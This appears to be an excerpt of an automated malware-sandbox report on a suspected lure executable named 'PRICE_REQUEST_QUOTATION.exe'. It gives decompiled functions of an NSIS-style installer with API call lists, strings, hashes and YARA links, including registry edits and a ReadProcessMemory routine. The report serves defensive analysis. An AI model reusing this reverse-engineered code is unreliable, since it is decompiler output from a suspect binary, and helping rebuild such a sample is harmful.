0x004024b0
0x004024b0
0x004028c1
0x004028cd

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0

Strings

C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp, xrefs: 00402385, 004023A7, 004023B7, 004023C2

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp
API String ID: 1356686001-340383955
Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 73332D80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E73332D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				void* _t24;
				intOrPtr _t28;

				_v12 = E73331480(_a4);
				_v8 = 0;
				_t24 = _a16;
				0x73330000(_a8, _a12, _t24, _a20, _a24);
				0x73330000("%p, %s, %p, %u, %p.\n", _a4, _t24);
				_push(_v12);
				 *0x73338000 = E73331120(_a4);
				if( *0x73338000 != 0) {
					_t28 =  *0x73338000;
					_t39 =  *(_t28 + 8);
					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
						_v8 = E73337730(_t39, GetLastError());
						0x73330000("Failed to read process memory %#x.\n", _v8);
					} else {
						if(_a24 != 0) {
							 *_a24 = _v16;
						}
					}
					return _v8;
				}
				return 0x8000ffff;
			}

0x73332d92
0x73332d95
0x73332da4
0x73332db0
0x73332dc2
0x73332dcd
0x73332dd6
0x73332de2
0x73332dfb
0x73332e00
0x73332e0c
0x73332e2d
0x73332e39
0x73332e0e
0x73332e12
0x73332e1a
0x73332e1a
0x73332e1c
0x00000000
0x73332e41
0x00000000

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 73332E04

Strings

Failed to read process memory %#x., xrefs: 73332E34
%p, %s, %p, %u, %p., xrefs: 73332DBD

Memory Dump Source

Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessRead
String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
API String ID: 1726664587-1385917401
Opcode ID: 74bf3cf28aa9f64e696521cf3d3203ba87b44359e452857aad357da8aeaf5617
Instruction ID: 25455e33d7dbacaba236bb83651c16a53f1cb7fbeac588cbcb0455c6a5c082f4
Opcode Fuzzy Hash: 74bf3cf28aa9f64e696521cf3d3203ba87b44359e452857aad357da8aeaf5617
Instruction Fuzzy Hash: 8F213EF6E00209AFDB20DF94D945FDE77B9AB49201F50C128F909DB250E738EA55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}

0x00402a79
0x00402a8a
0x00402a92
0x00402aba
0x00402aa1
0x00402aa4
0x00402af4
0x00402afa
0x00402afc
0x00000000
0x00402afc
0x00402ab1
0x00402ab6
0x00402ab8
0x00000000
0x00000000
0x00402ab8
0x00402acf
0x00402ad7
0x00402ade
0x00402b04
0x00402b0a
0x00000000
0x00000000
0x00402b12
0x00402b18
0x00402b1a
0x00000000
0x00000000
0x00000000
0x00402b1a
0x00000000
0x00402aed
0x00402b01

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
RegCloseKey.ADVAPI32(?), ref: 00402ACF
RegCloseKey.ADVAPI32(?), ref: 00402AF4
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ce8
0x00401cef
0x00401d1e
0x00401d26
0x00401d2d
0x00401d2d
0x004028c1
0x004028cd

APIs

GetDlgItem.USER32 ref: 00401CE2
GetClientRect.USER32 ref: 00401CEF
LoadImageA.USER32 ref: 00401D10
SendMessageA.USER32 ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79

Uniqueness

Uniqueness Score: -1.00%

Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}

0x0040467e
0x00404683
0x0040468b
0x0040468c
0x00404699
0x004046a1
0x004046a2
0x004046a4
0x004046a6
0x004046a8
0x004046ab
0x004046ab
0x004046b2
0x004046b8
0x004046b8
0x004046bf
0x004046c6
0x004046c9
0x004046cc
0x004046cc
0x004046d0
0x004046e0
0x004046e2
0x004046e5
0x0040468e
0x0040468e
0x00404695
0x00404695
0x004046ed
0x004046f8
0x0040470e
0x0040471e
0x0040473a

APIs

lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
wsprintfA.USER32 ref: 0040471E
SetDlgItemTextA.USER32 ref: 00404731

Strings

%u.%u%s%s, xrefs: 00404700

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bd3
0x00401bdf
0x00401be2
0x00401beb
0x00401beb
0x00401bee
0x00401bf2
0x00401bfb
0x00401bfb
0x00401bfe
0x00401c02
0x00401c04
0x00401c51
0x00401c53
0x00401c5c
0x00401c64
0x00401c67
0x00401c67
0x00401c70
0x00000000
0x00401c06
0x00401c0d
0x00401c0f
0x00401c17
0x00401c1a
0x00401c42
0x00401c76
0x00401c76
0x00401c1c
0x00401c2a
0x00401c32
0x00401c35
0x00401c35
0x00401c1a
0x00401c79
0x00401c7c
0x00401c82
0x00402866
0x00402866
0x004028c1
0x004028cd

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32 ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29

Uniqueness

Uniqueness Score: -1.00%

Function 004038E3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x6c0230
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "jwfmxhqapdbzygp Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x4
						_t27 =  *0x42ec48; // 0x6c03dc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6c03f4
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x004038e7
0x004038ec
0x004038f2
0x004038f7
0x004038f7
0x004038ff
0x00000000
0x00000000
0x00403901
0x00403907
0x0040390f
0x00403911
0x00403917
0x00403917
0x00403919
0x00403925
0x00000000
0x00000000
0x00403929
0x00000000
0x00000000
0x00000000
0x0040392b
0x00403930
0x00403939
0x0040393f
0x00403944
0x00403958
0x00403963
0x0040397b
0x00403981
0x00403986
0x0040398e
0x004039af
0x004039af
0x004039af
0x00403990
0x00403992
0x00403992
0x00403996
0x00403999
0x0040399d
0x0040399d
0x004039a2
0x004039a8
0x004039a8
0x00000000
0x00403992
0x00403946
0x0040394b
0x00403954
0x0040394d
0x0040394d
0x0040394d
0x0040394b

APIs

SetWindowTextA.USER32(00000000,jwfmxhqapdbzygp Setup), ref: 0040397B

Strings

1033, xrefs: 004038E7, 004038F1, 00403962
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 004038E4
jwfmxhqapdbzygp Setup, xrefs: 0040396A

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $1033$jwfmxhqapdbzygp Setup
API String ID: 530164218-1167926908
Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004056bb
0x004056d2
0x004056da
0x004056da
0x004056e2

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
lstrcatA.KERNEL32(?,00409010), ref: 004056DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d46
0x00401d5f
0x00401d69
0x00401d6e
0x00401d79
0x00401d80
0x00401d92
0x00401d98
0x00401d9d
0x00401da7
0x004024eb
0x00401561
0x00402866
0x004028c1
0x004028cd

APIs

GetDC.USER32(?), ref: 00401D3F
GetDeviceCaps.GDI32(00000000), ref: 00401D46
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}

0x00402bf8
0x00402c12
0x00402c18
0x00402c22
0x00402c28
0x00402c2e
0x00402c3f
0x00402c48
0x00000000
0x00402c4d
0x00402c54
0x00402c1a
0x00402c21
0x00402c21
0x00402bfa
0x00402bfa
0x00402c01
0x00402c04
0x00402c04
0x00402c0a
0x00402c11
0x00402c11

APIs

DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
GetTickCount.KERNEL32 ref: 00402C22
CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
ShowWindow.USER32(00000000,00000005), ref: 00402C4D

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
